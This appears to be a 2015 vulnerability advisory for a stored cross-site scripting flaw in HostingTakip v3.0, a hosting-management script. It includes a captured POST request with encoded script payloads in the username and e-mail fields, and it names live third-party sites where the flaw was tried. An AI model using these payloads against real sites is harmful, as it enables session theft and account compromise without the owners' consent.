HostingTakip v3.0 - Stored XSS Vulnerability

HostingTakip v3.0 - Stored XSS Vulnerability
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Discovered by: KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] HomePage : http://h4x0resec.blogspot.com
Love to _UnDeRTaKeR_ & BARCOD3 & Septemb0x & ZoRLu ( milw00rm.com )
############################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : HostingTakip
|~Affected Version : v3.0
|~Software :  http://www.hostingtakip.com & http://wmscripti.com/php-scriptler/hostingtakip-hosting-yonetim-scripti.html
|~Official Demo :  http://hostingtakip.teknoder.com/demo/
|~RISK : Medium
|~Tested On : [L] Windows 7, Mozilla Firefox
####################INFO################################
XSS payload is possible to run in your registration form.
click on "Yeni Müşteri" Here the e-mail section appears unprotected been no filtering
Any payload code to enter "uye-duzenle.php" on will be permanent and will work
########################################################
Tested on;
http://www.ayashosting.com
http://www.oneritasarim.com/hostingtakip/
----------------------------------------------------------
Proof image: http://i.hizliresim.com/mGZzQ8.png
----------------------------------------------------------
                      Request
----------------------------------------------------------
POST http://www.oneritasarim.com/hostingtakip/kayit_tamamla.php
   Request Headers:
      Host[www.oneritasarim.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://www.oneritasarim.com/hostingtakip/y_kullanici.php]
      Cookie[PHPSESSID=1b4b474c7fc50e0885aae61274ac0b55; __utma=221857094.828791546.1426246879.1426246879.1426246879.1; __utmc=221857094; __utmz=221857094.1426246879.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)]
      Connection[keep-alive]
   Post Data:
      kadi[%3C%2Fscript%3E%3Cscript%3Ealert%28%27h4+Here%27%29%3C%2Fscript%3E]
      posta[%3C%2Fscript%3E%3Cscript%3Ealert%28%27h4+Here%27%29%3C%2Fscript%3E]
      sifre[123456]
      ad[123456]
      tc[012345678901]
      tel[12345678901]
      mustip[b]
      sehir[h4]
      ilce[h4]
      adres[h4x0resec.blogspot.com]
      hakkimda[h4]
      guv[1b4b47]
      B1[G%F6nder]
   Response Headers:
      Content-Encoding[gzip]
      Vary[Accept-Encoding]
      Date[Fri, 13 Mar 2015 12:18:10 GMT]
      Server[LiteSpeed]
      Connection[close]
      Expires[Thu, 19 Nov 1981 08:52:00 GMT]
      Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
      Pragma[no-cache]
      Content-Type[text/html]
      Content-Length[143]